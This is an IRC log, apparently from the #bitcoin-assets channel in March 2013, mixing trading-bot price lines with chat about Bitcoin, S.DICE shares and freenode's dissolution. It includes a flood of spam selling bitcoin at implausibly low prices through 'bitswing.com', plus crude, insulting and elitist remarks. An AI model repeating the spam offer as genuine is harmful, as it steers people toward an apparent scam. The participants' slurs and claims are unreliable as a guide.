59.85000, Bid-ask spread: 0.00800, Last trade: 59.84200, 24 hour volume: 117139.99539755, 24 hour low: 50.00000, 24 hour high: 62.00000, 24 hour vwap: 55.05158 Mar 20 01:31:58 no more freenode PDPC Mar 20 01:32:02 [BTCTC] [ESECURITYSABTC] 2 @ 0.4748 = 0.9496 BTC [-] Mar 20 01:32:03 what ?! Mar 20 01:32:12 but thanks for donating Mar 20 01:32:25 haha no srsly, what notice ? Mar 20 01:32:44 http://blog.freenode.net/ Mar 20 01:32:50 ;;goxlag Mar 20 01:32:51 30.436804 seconds Mar 20 01:32:53 ;;ticker Mar 20 01:32:53 BTCUSD ticker | Best bid: 59.84200, Best ask: 59.85000, Bid-ask spread: 0.00800, Last trade: 59.84200, 24 hour volume: 117139.99539755, 24 hour low: 50.00000, 24 hour high: 62.00000, 24 hour vwap: 55.05158 Mar 20 01:34:31 Due to the massive reduction in financial support we found ourselves in a position where being an incorporated organisation cost more than what we were able to bring in in donations and after years of operating at a loss it was decided that we would apply for the dissolution of the corporation in order to drastically reduce costs. Mar 20 01:34:45 lmao. so wait, the few hundreds i donated were most of their fiscal income ? Mar 20 01:34:56 seeing how... well... there's some costs to maintain status but they're not THAT high Mar 20 01:35:46 you were the first person to donate in years, someone is taking that money and running Mar 20 01:35:50 who posted that Mar 20 01:36:17 dub roflmao Mar 20 01:36:32 [BTCTC] [RSM] 1 @ 0.00574 BTC [-] Mar 20 01:36:33 wait, you're saying i got scammed by freenode ? Mar 20 01:36:35 richih Mar 20 01:36:45 being an incorporated organisation costs like $200 Mar 20 01:36:46 tiberiusiv http://blog.freenode.net/ Mar 20 01:36:56 tiberiusiv yeah. in the uk it's more like 250 pounds iirc Mar 20 01:37:21 they shoulda taken bitcoins Mar 20 01:37:36 i should start a foundation... Mar 20 01:37:36 everbody here is like... wutlol?!? Mar 20 01:37:40 [BTCTC] [RSM] 2 @ 0.00575 = 0.0115 BTC [+] Mar 20 01:38:15 pizzaman1337 ping Mar 20 01:38:32 mircea_popescu: pong Mar 20 01:38:38 freenode is retarded Mar 20 01:39:23 and yet runs a service that makes all of our lives a little better or easier for negligible outlay? Mar 20 01:39:33 though it got a lot less retarded after a certain someone got run over Mar 20 01:39:44 did we actually hit 62 Mar 20 01:39:44 wtf Mar 20 01:40:05 im not aware of any other incorporated ircnets Mar 20 01:40:05 Bowjob we're headed for 100 here Mar 20 01:40:12 dub me either iirc Mar 20 01:40:20 yes of course Mar 20 01:40:36 i was cleaning my room.. them bam! 62 Mar 20 01:41:30 i guess smickles just can't get a cloak huh. Mar 20 01:42:21 ahaha this girl! https://bitcointalk.org/index.php?topic=137459.msg1641634#msg1641634 Mar 20 01:42:57 [MPEX] [S.MPOE] 7436 @ 0.00071978 = 5.3523 BTC [+] Mar 20 01:46:26 who ever heard of this nonsense anyway. dissolve the charity, not announce in advance... Mar 20 01:46:36 you could say you know... hey douches... next month. next week! something. Mar 20 01:47:26 are you seriously surprised? Mar 20 01:47:28 they don't have customers. Mar 20 01:47:33 why should they act as if they did? Mar 20 01:48:18 stakeholders is the correct expression in this circumstance. Mar 20 01:48:20 and they do have those. Mar 20 01:48:37 no charity can ever have customers. Mar 20 01:49:11 probably why pathological behavior is so common among charities. Mar 20 01:49:50 panic sell on S.dice wtf :( Mar 20 01:49:57 !ticker m s.dice Mar 20 01:49:58 [MPEX:S.DICE] 1D: 0.004 / 0.00440918 / 0.0051 (54330 shares, 239.55 BTC), 7D: 0.004 / 0.00482395 / 0.00599987 (125487 shares, 605.34 BTC), 30D: 0.00300001 / 0.00605764 / 0.0069 (2344808 shares, 14,204.01 BTC) Mar 20 01:50:09 o hey. going back to ipo levels ? Mar 20 01:51:21 40K profit since... Mar 20 01:52:18 error4733 bitcoin markets be well fickle Mar 20 01:52:22 [MPEX] [S.DICE] 7158 @ 0.004 = 28.632 BTC [-] Mar 20 01:52:56 bitfunder sdice is up, which is relative Mar 20 01:52:58 [MPEX] [S.MPOE] 976 @ 0.00073645 = 0.7188 BTC [+] Mar 20 01:53:11 be well fickle indeed Mar 20 01:53:24 bets on today's close? Mar 20 01:53:31 dice doesnt look so good Mar 20 01:54:43 benkay: today's close? market doesn't close... Mar 20 01:55:01 pick a universal timestamp, pizzaman1337. Mar 20 01:55:10 price at that time. Mar 20 01:55:13 what ever happened to ianbakewell Mar 20 01:55:18 would be a good way to do daily bets Mar 20 01:55:21 he shorted btc at 34.50 Mar 20 01:55:28 hasnt been online for 15 days Mar 20 01:55:38 depression? Mar 20 01:55:55 he shorted s.dice when it was 0.62 Mar 20 01:56:00 so he did something okay Mar 20 01:56:05 not enough to cover 600 BTC short Mar 20 01:56:19 and when does he have to cover the dice, not out of the woods yet Mar 20 02:00:46 whatever happened to proudhon Mar 20 02:03:01 ;;ticker Mar 20 02:03:01 BTCUSD ticker | Best bid: 59.11711, Best ask: 59.74999, Bid-ask spread: 0.63288, Last trade: 59.11710, 24 hour volume: 111543.27108190, 24 hour low: 50.00000, 24 hour high: 62.00000, 24 hour vwap: 55.39889 Mar 20 02:03:46 $12 diff from the 24h low and high Mar 20 02:04:35 lol this could be a meme. Mar 20 02:04:44 "he shorted btc at XXX. hasnt been online for 15 days" Mar 20 02:06:03 not as bad as that dude who called 23.98 the top of 2013 Mar 20 02:07:40 MP:not big diff b/t fickle et fucked. look at the book... just no way to sell if you want your money back.. :fu: Mar 20 02:08:33 300 bucks at the end of the year Mar 20 02:08:51 117`362 sell wall on S.DICE at .004... :( Mar 20 02:09:12 deposits flushed Mar 20 02:09:31 i shorted at $2 and im still here Mar 20 02:09:33 error4733 was a 3.5mn wall at 31 iirc. gone ? Mar 20 02:09:54 I've seen S.Dice tanking honestly Mar 20 02:09:54 yes, early today Mar 20 02:09:56 https://bitcointalk.org/index.php?topic=135760.0 Mar 20 02:09:56 read Mar 20 02:10:49 I like how ian says more people will gamble on dice the higher the price Mar 20 02:10:56 but then he shorts it anyway Mar 20 02:11:09 problem of trading stocks denominated in rapidly appreciating currency Mar 20 02:11:22 well... here's the thing. markets cycle. either this is nonsense and so the savvy will make a pretty penny buying it once the retail investors dumped Mar 20 02:11:26 [MPEX] [S.DICE] 2000 @ 0.00383838 = 7.6768 BTC [-] Mar 20 02:11:30 or else the concerns are legitimate and sdice is going to shit. Mar 20 02:12:02 [HAVELOCK] [SDICE] 3 @ 0.42 = 1.26 BTC [+] Mar 20 02:12:07 its been going shit the last 2 months but okey Mar 20 02:12:26 in any case, my concern was legit and proven right now Mar 20 02:12:32 until dice goes back to 0.75 Mar 20 02:12:53 sdice will myspace it up by end of the year Mar 20 02:13:10 i got out at 0.75 and 0.62, lets see where this goes Mar 20 02:13:26 i saw some whale playing, he lost 400 BTC on one bet or something Mar 20 02:13:32 they're divs are shit house too Mar 20 02:13:40 iirc this month div is going to be low, a few hundred or something Mar 20 02:13:44 for this month. dice is up about 3k Mar 20 02:13:48 a ok Mar 20 02:13:58 wait all month for small shit Mar 20 02:14:15 erik was smart to sell those shares Mar 20 02:14:34 of course he was, he probably foresaw this Mar 20 02:14:37 [MPEX] [S.MPOE] 2600 @ 0.00072738 = 1.8912 BTC [-] Mar 20 02:14:51 foresaw what? increasing profits? Mar 20 02:14:54 he still owns like what, 87% or so ? Mar 20 02:15:35 he doesnt own dice 100% irrc Mar 20 02:15:40 pigeons: a month where S.DICE was lower and might have a grim-looking future compared to what it seemed it would be Mar 20 02:15:53 he said thers 2-3 private investors Mar 20 02:15:56 I think it's only a matter of time before the BTC price affects S.DICE bet volume Mar 20 02:16:11 pizzaman1337: people keep saying that and keep being wrong, but maybe Mar 20 02:16:47 pigeons: I'd like to hope with them as I'm a shareholder (just hold a little) Mar 20 02:17:08 pizzaman1337: re-read Mar 20 02:17:26 ok, I'd like to be wrong Mar 20 02:17:32 [MPEX] [S.BBET] 2500 @ 0.0018 = 4.5 BTC [+] Mar 20 02:17:46 so far just you are wrong Mar 20 02:18:05 I want to keep being wrong Mar 20 02:18:09 :) Mar 20 02:18:20 ok, i bet you are wrong and right a few times before its over Mar 20 02:19:05 ^ Mar 20 02:19:08 if only i could Mar 20 02:19:12 the 400 bet was just a losing martingale Mar 20 02:19:38 error4733: that's good Mar 20 02:19:45 it means suckers exist Mar 20 02:20:15 true, they bought s.dice overpriced at 0.0075 :D Mar 20 02:21:02 the 0.75 came with the expectation that the whale would continue playing Mar 20 02:21:09 who is a bigger sucker, the person still getting better than fiat dividends from her 0.0075 S.DICE shares, or the sucker playing a negative EV strategy? Mar 20 02:21:12 with the same intensity or even better Mar 20 02:21:15 i'm still in green but is earasing the btc rally :( Mar 20 02:21:41 "hey chris surrender yet? " Mar 20 02:21:45 He went offline Mar 20 02:21:47 LOL Mar 20 02:22:09 its the dude I told about BTC when it was 17, never bought any even though he expressed interest in buying some Mar 20 02:22:14 mircea_popescu: will the mpex bot start doing some market making on options above 750 at some point? Mar 20 02:22:37 pizzaman1337 quite likely. Mar 20 02:22:45 any ETA? just curious Mar 20 02:22:48 it was 1-35 last month, it was 1-20 before that Mar 20 02:23:18 well... atm im trying to discern what tyhe fuck to do here, because price went up so much. i am guessing i'll do 15-150 by steps of 3 Mar 20 02:23:26 which means it'll wait till options expire. Mar 20 02:25:11 Bowjob i think the argument is misplaced. unless you actually NEED the btc, having the shares produces future revenue. even one satoshi is revenue Mar 20 02:25:26 holding the btc or throwing them around in weird loan schemes etc does not. Mar 20 02:25:37 bah, soebot had an overflow error Mar 20 02:25:46 what's that ? too much soe ? Mar 20 02:25:49 btc price is too damn high Mar 20 02:26:18 it's a play on mpoebot Mar 20 02:26:53 oh Mar 20 02:28:45 wow i've made enough coins to quit and go make a movie Mar 20 02:29:01 what a proud moment i thought it was going to take me all year Mar 20 02:29:24 :D Mar 20 02:29:25 wd Mar 20 02:29:39 :) its tripped out, owe a huge thanks to bitcoin Mar 20 02:33:19 amazingrando got scammer tag ? Mar 20 02:33:57 wasnt he gonna list her Mar 20 02:33:58 e Mar 20 02:36:15 http://amazonbitcoins.com/gone Mar 20 02:37:24 operators say they are suprised amazon let them get away with using their log and name this long Mar 20 02:37:41 amazonlitecoins.com to open next week Mar 20 02:38:23 lmao Mar 20 02:38:54 "We had a good run, and we can't thank our customers enough for their overwhelming adoption and support. It truly is hard to believe that less than a month after launching we have hundreds of users and have processed thousands of dollars per day." Mar 20 02:38:56 mmmkay. Mar 20 02:40:46 ;;bc,24hprc Mar 20 02:40:48 55.60 Mar 20 02:43:11 ;;ticker Mar 20 02:43:12 BTCUSD ticker | Best bid: 59.40000, Best ask: 59.75998, Bid-ask spread: 0.35998, Last trade: 59.77000, 24 hour volume: 105293.89337341, 24 hour low: 50.22010, 24 hour high: 62.00000, 24 hour vwap: 55.89276 Mar 20 02:43:13 how often does the mpex bot recalc it's market options offerings prices? Mar 20 02:43:18 its* Mar 20 02:44:22 [BTCTC] [COGNITIVE] 7 @ 0.16002 = 1.1201 BTC [-] Mar 20 02:44:34 [BTCTC] [COGNITIVE] 2 @ 0.16 = 0.32 BTC [-] Mar 20 02:44:44 [BTCTC] [COGNITIVE] 1 @ 0.13 BTC [-] Mar 20 02:45:24 [BTCTC] [BASIC-MINING] 3 @ 0.33318 = 0.9995 BTC [-] Mar 20 02:45:40 [BTCTC] [COG.F] 1 @ 2.5 BTC Mar 20 02:46:36 [MPEX] [O.BTCUSD.P570T] 1 @ 0.09636292 BTC Mar 20 02:48:52 ahhh 60 looks so pretty. Mar 20 02:50:46 not when you got to make another buy tomorrow :P Mar 20 02:52:53 [BTCTC] [COGNITIVE] 1 @ 0.16002 BTC [+] Mar 20 02:52:56 [BTCTC] [COGNITIVE] 1 @ 0.16002 BTC [+] Mar 20 02:54:58 [MPEX] [O.BTCUSD.P570T] 6 @ 0.0963272 = 0.578 BTC [-] Mar 20 02:58:05 [BTCTC] [S.MPOE-PT] 120 @ 0.000712 = 0.0854 BTC [+] Mar 20 03:03:02 <[\\\]> hello Mar 20 03:03:12 hai Mar 20 03:03:15 yes hello Mar 20 03:03:25 <[\\\]> ;;seen dust Mar 20 03:03:25 I have not seen dust. Mar 20 03:03:46 <[\\\]> ;;seen dub Mar 20 03:03:47 dub was last seen in #bitcoin-assets 31 seconds ago: yes hello Mar 20 03:03:50 <[\\\]> yay Mar 20 03:04:08 is not dug Mar 20 03:04:24 <[\\\]> dust doesn't like me Mar 20 03:04:29 <[\\\]> then again, many people don't Mar 20 03:04:32 <[\\\]> I'm a douche. Mar 20 03:05:02 [MPEX] [S.MPOE] 3724 @ 0.00073645 = 2.7425 BTC [+] Mar 20 03:05:04 [MPEX] [S.MPOE] 2246 @ 0.00073744 = 1.6563 BTC [+] Mar 20 03:05:43 slushe Mar 20 03:07:39 <[\\\]> ;;seen jurov Mar 20 03:07:40 jurov was last seen in #bitcoin-assets 3 hours, 40 minutes, and 31 seconds ago: that's VERY rogue taxidermy Mar 20 03:09:11 mircea: are you an sdice shareholder? Mar 20 03:10:36 yeah Mar 20 03:11:05 adding at these levels? Mar 20 03:11:14 [MPEX] [S.MPOE] 4032 @ 0.00072738 = 2.9328 BTC [-] Mar 20 03:11:26 well that i can't say. Mar 20 03:12:31 what did sdice ipo at? Mar 20 03:12:37 last year Mar 20 03:13:11 (b)Based on their knowledge of the company and its assets, as well as on evaluation of market demand, current profitability and projected evolution, the representatives of SatoshiDice have elected to offer in this IPO a total of 10`000`000 (ten million) shares, as follows : one block of 2`000`000 (two million) shares at a price of 0.0032 BTC each ; one block of 5`000`000 (five million) shares at a price of 0.0034 BTC e Mar 20 03:13:11 ach ; one block of 3`000`000 (three million) shares at a price of 0.0037 BTC each. Mar 20 03:24:37 http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/ Mar 20 03:24:42 this is an interesting one... Mar 20 03:26:58 [BTCTC] [COGNITIVE] 1 @ 0.16001 BTC [-] Mar 20 03:32:17 lulz Mar 20 03:34:34 http://polimedia.us/dtng/c/src/136370145631.jpg prolly the best swimsuit ever. Mar 20 03:36:29 [BTCTC] [S.DICE-PT] 58 @ 0.00462 = 0.268 BTC [-] Mar 20 03:36:32 [BTCTC] [S.DICE-PT] 33 @ 0.00462 = 0.1525 BTC [-] Mar 20 03:36:35 [BTCTC] [S.DICE-PT] 909 @ 0.00455 = 4.136 BTC [-] Mar 20 03:41:20 <[\\\]> I'm not diggin the thighs Mar 20 03:41:22 [BTCTC] [BTC-BOND] 1 @ 0.0099 BTC [-] Mar 20 03:41:34 <[\\\]> they look like they were photoshopped on Mar 20 03:41:59 indeed they don't look too azn do they Mar 20 03:42:35 <[\\\]> racist Mar 20 03:42:43 esp seeing how her thick butt is about 20x the thickness of her wrist Mar 20 03:43:07 <[\\\]> right where her hand touches, its weird there Mar 20 03:43:31 <[\\\]> but I suppose its possible Mar 20 03:43:31 <[\\\]> meh Mar 20 03:43:33 a well. so our dreams are shatter't on the cold shores of jagged reality Mar 20 03:44:23 <[\\\]> there's several billion of them, so waht if 1 doesn't match? Mar 20 03:44:45 ikr? Mar 20 03:47:11 <[\\\]> so what's the mpex fee up to now? Mar 20 03:47:13 30 Mar 20 03:47:42 <[\\\]> ;;calc 30 * [ticker --last] Mar 20 03:47:43 1790.6982 Mar 20 03:47:44 <[\\\]> not bad Mar 20 03:48:01 <[\\\]> it costs more for exchange membership than many people's mortgage Mar 20 03:48:48 not to mention it generated 100's of k's worth of value or so for the people who didn't procrastinate/think themselves better/entitled/whatever. Mar 20 03:49:05 <[\\\]> seperate the smart from the dumb Mar 20 03:49:25 you and me baby are nothing but mammals so let's do it the bitcoin way! Mar 20 03:50:23 lets do it like they do it in the bitcoin-assets channel Mar 20 03:50:33 http://www.youtube.com/watch?v=xat1GVnl8-k Mar 20 03:51:09 nice, reminds me me fingerbanging girls at 15 Mar 20 03:51:37 need some beastie boys Mar 20 03:53:14 intergalactic Mar 20 03:53:51 planetary Mar 20 03:53:56 intergalactic Mar 20 03:54:09 nvm. Mar 20 03:54:11 <[\\\]> lol Mar 20 03:54:14 lol Mar 20 03:54:24 <[\\\]> culture fail Mar 20 03:55:42 lul kako Mar 20 03:56:05 check out this guy https://bitcointalk.org/index.php?topic=154258.msg1643783#msg1643783 Mar 20 03:56:30 7500 words expended to clearly show he doesn't understand what exactly shareholders are, how they're different from founders and wtf exactly finance is Mar 20 03:56:55 for the past two years i've been drowning in well meaning idiocy. it's a fate worse than death. Mar 20 03:57:01 i blame the education system. Mar 20 03:58:07 and also i blame the equalitarian atmosphere in the english speaking world. there's no worse form of child abuse than telling them they're equal to anyone. Mar 20 03:59:10 pants Mar 20 04:01:20 ;;ticker Mar 20 04:01:21 BTCUSD ticker | Best bid: 59.66661, Best ask: 59.90000, Bid-ask spread: 0.23339, Last trade: 59.90000, 24 hour volume: 103877.10338041, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.15735 Mar 20 04:01:38 <[\\\]> I'm pretty certain Britain doesn't tell everyone they're equal to anyone Mar 20 04:01:42 <[\\\]> and they're fucking English Mar 20 04:02:07 show me a one case past 15 years where a kid was told "you can't do what this other kid does because he is better than you" Mar 20 04:02:19 in any sort of institutional setting. Mar 20 04:02:27 i'd even settle for "you can't X because you suck" Mar 20 04:02:33 <[\\\]> oh right, because I'm in the UK school system Mar 20 04:02:39 <[\\\]> jesus christ, they still have nobility Mar 20 04:02:42 <[\\\]> that right there tells them Mar 20 04:02:46 <[\\\]> STFU already Mar 20 04:02:46 no it doesn't. Mar 20 04:02:47 <[\\\]> you're done. Mar 20 04:02:50 lol Mar 20 04:03:04 not like they have to go on their knees when nobility enters the room Mar 20 04:03:15 or at least motherfucking stand up, which is really the absolute fucking minimum. Mar 20 04:05:35 [MPEX] [S.MPOE] 7110 @ 0.00073526 = 5.2277 BTC [+] Mar 20 04:05:36 [MPEX] [S.MPOE] 4732 @ 0.00072738 = 3.442 BTC [-] Mar 20 04:05:41 [MPEX] [S.MPOE] 5650 @ 0.00071402 = 4.0342 BTC [-] Mar 20 04:06:34 < [\\\]> jesus christ, they still have nobility << they still have nobility who exercise royal prerogitive Mar 20 04:07:52 ya know, from what i understand about the retained prerogitive, the queen could prevent the prime minister of canada from taking office after being elected Mar 20 04:08:36 yeeeea Mar 20 04:08:49 man Mar 20 04:09:06 problem is, it;'s never used, so it just serves as perverse strengthening of the equalitarian delusion. Mar 20 04:09:09 has to do with the viceroy or something Mar 20 04:09:14 every times smickles trots out some alex jonesism I die a little Mar 20 04:09:57 lol, dub it's not like i think she could actually exercise that power Mar 20 04:10:20 you will find any number of antiquated bylaws in every legal system, shit thats not worth legistlating over Mar 20 04:10:37 for example its required for hoteliers to provide horse parking in the capital of my country Mar 20 04:10:53 but they apparently do still exercise the power by quashing laws in england which would deprive them of land and such Mar 20 04:11:14 [MPEX] [S.MPOE] 1806 @ 0.00070749 = 1.2777 BTC [-] Mar 20 04:11:15 smickles it's not about some obscure exercise of power. Mar 20 04:11:27 it's about people being forcibly confronted with proof of their inferiority in a social setting, Mar 20 04:11:35 as a proxy for their actual inferiority in reality. Mar 20 04:11:45 helps them learn about what they can and can do and so should or shouldn't attempt. Mar 20 04:12:13 heh, yeah, different topic entirely Mar 20 04:12:56 'the queen runs canada' is a fairly common complaint in the extreme libertard circles is all im saying Mar 20 04:14:35 i've hardly any idea who runs canada. Mar 20 04:14:49 moosecock runs canada Mar 20 04:15:08 moosecock it is then. cheers to moosecock Mar 20 04:16:57 can't it be something a little more palatable ? Mar 20 04:17:02 what's a girl to do with moosecock Mar 20 04:17:10 like other british colonies they have a prime minister who fronts one of several political parties, advised by a caucus/cabinet of senior members and the lowly back benchers Mar 20 04:17:14 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:14 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:14 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:15 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:15 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:15 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:16 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:17 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:18 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:18 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:19 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:19 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:19 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:19 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:19 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:20 █▓▒10 Bitcoin=$279.99 (www.bitswing.com) [delivery in 5 minutes]no phone call for verify,no personal information need 2 Bitcoin=$89.99 5 Bitcoin=$199.99 20 Bitcoin=$489.99 www.bitswing.com 30 Bitcoin=$699.99 40 Bitcoin=$899.99 50 Bitcoin=$1099.99 http://www.bitswing.com http://www.bitswing.com Mar 20 04:17:31 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Mar 20 04:17:33 bfdshresjhreshj!*@* added to ignore list. Mar 20 04:17:39 effective marketing campain you have there Mar 20 04:17:39 da fuck. Mar 20 04:18:24 kakobrekla can you set assbot to autoban on any mention of bitswing.com for an hour ? Mar 20 04:19:00 bitswing sounds like some kind of meatspin variant Mar 20 04:19:09 in theory i could but you would be banned now Mar 20 04:19:25 you know what's gonna happen, tomorrow diff ip Mar 20 04:20:05 its BitsWing Mar 20 04:20:07 retarded kid, didn't even come up with a random name, just mashed kbd Mar 20 04:20:16 hm Mar 20 04:20:31 I need these diff futures to close so I can buy this S.DICE Mar 20 04:20:35 .004 Mar 20 04:20:37 really? Mar 20 04:20:45 all confidence is lost? Mar 20 04:20:53 !ticker m s.dice Mar 20 04:20:54 [MPEX:S.DICE] 1D: 0.00383838 / 0.00434507 / 0.0051 (63488 shares, 275.86 BTC), 7D: 0.00383838 / 0.00476551 / 0.00599987 (134645 shares, 641.65 BTC), 30D: 0.00300001 / 0.00604938 / 0.0069 (2352566 shares, 14,231.58 BTC) Mar 20 04:21:03 275 btc's worth of confidence Mar 20 04:21:07 !last m. s.dice Mar 20 04:21:07 I haven't understood a single word you've said since I met you, not one single word. Mar 20 04:21:13 !last m s.dice Mar 20 04:21:14 Last trade for S.DICE on MPEX was at 0.00383838 BTC [-] Mar 20 04:21:15 [BTCTC] [S.DICE-PT] 830 @ 0.00455 = 3.7765 BTC [-] Mar 20 04:22:03 !rules Enky_Away Mar 20 04:22:20 ;;ticker Mar 20 04:22:21 BTCUSD ticker | Best bid: 59.80001, Best ask: 59.84000, Bid-ask spread: 0.03999, Last trade: 59.84000, 24 hour volume: 105452.24769737, 24 hour low: 51.00000, 24 hour high: 62.00000, 24 hour vwap: 56.25821 Mar 20 04:22:31 CM shows 60.11 Mar 20 04:22:33 [BTCTC] [GSDPT] 190 @ 0.004231 = 0.8039 BTC [-] Mar 20 04:23:19 ;;goxlag Mar 20 04:23:20 0.121863 seconds Mar 20 04:23:52 http://www.theblaze.com/stories/2013/03/19/282-page-handbook-details-recommended-rules-of-cyberwar-engagement/ Mar 20 04:25:36 funny. i wonder if the roman empire had rules about barbarian shaving practices right before odoacer Mar 20 04:26:00 $60.59 Mar 20 04:27:04 in january it was 15 Mar 20 04:27:10 400% in 2 months Mar 20 04:28:23 Cyprus rally? Mar 20 04:28:34 probably a large part of it Mar 20 04:28:57 it's funny, cyprus govt destroyed 5bn euro worth of suckers fiat, Mar 20 04:29:08 created ~300 mn usd worth of bitcoin wealth. Mar 20 04:29:25 ty eu. keep on with your policies, a 4-5% conversion engine is great for bitcoin. Mar 20 04:29:31 by the time you're all done we'll be quite okay. Mar 20 04:31:02 Or, Utopia if you are an anarcho-capitolist. Mar 20 04:31:13 [MPEX] [S.MPOE] 2828 @ 0.00073744 = 2.0855 BTC [+] Mar 20 04:31:28 B0g4r7 beetlebee benkay bgupta BitHub BitOTTer21 blacktape blu3gr1ffon Bowjob Bugpowder burnside Mar 20 04:31:41 actually bgupta ... any sort of future that includes the state is science fiction at this point. Mar 20 04:33:50 perhaps a bit hyperbolic? but I get your gist. Mar 20 04:34:17 mircea_popescu hyperbolic? nevar Mar 20 04:34:18 i don't think so. without a cheap and effective way to maintain informational supremacy and without control of wealth transfer there simply can't be a state. Mar 20 04:34:20 https://support.mtgox.com/entries/21659340--Outage-59372-Bitcoin-Deposit-Delay dunno if this is old news tro you guys Mar 20 04:34:31 um it is old Mar 20 04:34:33 the original innovation that even allowed the state (ie, bureaucracy) has been meanwhile erroded by the internet. Mar 20 04:34:44 by now with bitcoins... there's really nothing left. Mar 20 04:35:27 You are assuming that certain states wouldn't just shut down the public telco grid to survive. Mar 20 04:35:37 no, i'm not assuming that. Mar 20 04:35:46 this is like saying "miners will be shutting out s.dice" Mar 20 04:35:50 it's not their option to do this. Mar 20 04:35:57 if they do, they just cease being states at all. Mar 20 04:36:16 unless, of course, you imagine the amish are some sort of separatist state within the us. Mar 20 04:36:25 tx over sneakernet Mar 20 04:36:52 has cyprus gone through with the taxation yet? Mar 20 04:36:57 nope. Mar 20 04:37:09 they've changed the proposed law 3 times so far, still not a law. Mar 20 04:37:10 oh I saw a good quote in -dev for you MP Mar 20 